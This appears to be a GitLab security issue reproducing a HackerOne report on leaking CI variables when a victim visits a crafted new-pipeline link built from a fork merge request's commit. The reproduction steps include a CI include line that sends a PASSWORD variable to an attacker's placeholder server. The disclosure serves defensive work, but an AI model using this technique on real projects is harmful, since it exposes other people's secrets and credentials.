Backend: Leaking CI variables by visiting the pipeline new page via fork MRs

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2031741 by shells3c on 2023-06-19, assigned to @ottilia_westerlund:

Report | How To Reproduce

Report

SSOT

Refer to #417275 (closed)

Summary

Just by visiting a link crafted by the attacker, developers can leak CI variables to the outside

Steps to reproduce

1. Setup a web server
2. Create a public project with a CI variable, let's say PASSWORD
3. Using another account (attacker), fork the project, add (or edit) .gitlab-ci.yml:

include:  
  remote: 'https://<your_server>/${PASSWORD}.yaml'  

4. Copy the commit SHA and create a merge request with that change (to the victim project)
5. The following URL is the attack vector: https://gitlab.com/<victim_project_path>/-/pipelines/new?ref=<copied_sha>

If the victim visits this link, the CI variable will be sent to the attacker's server. You can try it out by accessing the URL from the victim account

Output of checks

This bug happens on GitLab.com

Impact

Developers can leak CI variables of their project by visiting a link

How To Reproduce

Please add reproducibility information to this section:

This page may contain information related to upcoming products, features and functionality. It is important to note that the information presented is for informational purposes only, so please do not rely on the information for purchasing or planning purposes. Just like with all projects, the items mentioned on the page are subject to change or delay, and the development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.